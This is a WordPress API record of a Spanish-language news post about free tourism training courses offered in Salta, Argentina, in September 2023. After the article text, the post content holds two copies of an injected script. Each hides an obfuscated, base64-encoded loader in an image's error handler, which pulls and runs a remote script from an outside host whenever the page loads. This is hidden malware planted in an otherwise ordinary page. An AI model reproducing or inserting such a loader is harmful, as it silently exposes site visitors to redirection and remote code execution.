{"id":3058,"date":"2023-09-05T10:29:18","date_gmt":"2023-09-05T13:29:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3058"},"modified":"2025-08-14T00:09:10","modified_gmt":"2025-08-14T03:09:10","slug":"cursos-de-capacitacion-turistica-en-septiembre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3058","title":{"rendered":"Cursos de capacitaci\u00f3n tur\u00edstica en septiembre"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#6f0530\"><em>Prestadores tur\u00edsticos podr\u00e1n participar de distintos cursos de capacitaci\u00f3n gratuitos organizados por el Ministerio de Turismo y Deportes. Los interesados deben inscribirse en https:\/\/www.turismotecapacita.com\/<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes contin\u00faa con sus cursos de formaci\u00f3n en el marco del Programa Turismo Te Capacita, los cursos de ingl\u00e9s y portugu\u00e9s a cargo a cargo del Instituto Salte\u00f1o de Idiomas de extender\u00e1n hasta noviembre dos veces por semana. &nbsp;Se debe registrar inscripci\u00f3n en&nbsp;<strong>https:\/\/www.turismotecapacita.com\/<\/strong><\/p>\n\n\n\n<p>Hoy&nbsp;martes 5 se realizar\u00e1 en el Centro de Convenciones el 1er Foro Regional de Turismo Internacionalizaci\u00f3n Regional para Crecer, el mismo contar\u00e1 con la presencia de autoridades tur\u00edsticas del Ente Norte de Turismo y prestadores del sector. En la oportunidad se realizar\u00e1n paneles de expertos nacionales e internacionales<\/p>\n\n\n\n<p>Por otra parte, el mi\u00e9rcoles 6 el experto V\u00edctor Chal\u00e9 expondr\u00e1 sobre El Desarrollo de Productos y Experiencias en Destinos Tur\u00edsticos Competitivos; ese d\u00eda, de manera virtual, Ver\u00f3nica Velardo, se referir\u00e1 a Ruta de San Francisco Solano. T\u00e9cnica de guiado pedestre, el mismo ser\u00e1 de manera virtual y est\u00e1 destinado a San Jos\u00e9 de Metan y Rosario de la Frontera.<\/p>\n\n\n\n<p>En tanto, el viernes 8 Florencia Marcilese visitar\u00e1 los Parques Urbanos donde el personal participar\u00e1 de la charla Salta por un Destino Sostenible. C\u00e1lculo de la Huella de Carbono Parques Urbanos. Adem\u00e1s del jueves 21 al s\u00e1bado 23, de manera presencial, Javier Arias y Felipe Usandivaras expondr\u00e1n en Los Toldos Iniciaci\u00f3n a la Observaci\u00f3n de Aves.<\/p>\n\n\n\n<p>Del lunes 25 al viernes &nbsp;29 el Ministerio de Turismo y Deportes de Salta ofrecer\u00e9 la charla El Turismo crece con los ni\u00f1os.Sensibilizaci\u00f3n infantil, est\u00e1 destinado a estudiantes de nivel primario de los Municipios de la Provincia Formadores de Cultura Tur\u00edstica Infantil.<\/p>\n\n\n\n<p>Prestadores de San Jos\u00e9 de Metan y Rosario de la Frontera podr\u00e1n participar de manera on line del curso Ruta de San Francisco Solano. T\u00e9cnica de Interpretaci\u00f3n que el martes 26 dictar\u00e1 de manera on line Ver\u00f3nica Velardo<\/p>\n\n\n\n<p>Las capacitaciones del mes finalizar\u00e1n el mi\u00e9rcoles 27 con el curso Un espacio para los ni\u00f1os con el turismo y el ambiente que se realizar\u00e1 en El Tala de manera presencial, estar\u00e1 a cargo del Misterio de Turismo y Deportes de Salta y destinado a estudiantes de nivel primario.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cursos-de-capacitacion-turistica-en-septiembre-91651\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Prestadores tur\u00edsticos podr\u00e1n participar de distintos cursos de capacitaci\u00f3n gratuitos organizados por el Ministerio de Turismo y Deportes. Los interesados deben inscribirse en https:\/\/www.turismotecapacita.com\/ El Ministerio de Turismo y Deportes contin\u00faa con sus cursos de formaci\u00f3n en el marco del Programa Turismo Te Capacita, los cursos de ingl\u00e9s y portugu\u00e9s a cargo a cargo del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3059,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3058","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3058"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3058"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3058\/revisions"}],"predecessor-version":[{"id":6974,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3058\/revisions\/6974"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3059"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3058"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3058"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3058"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}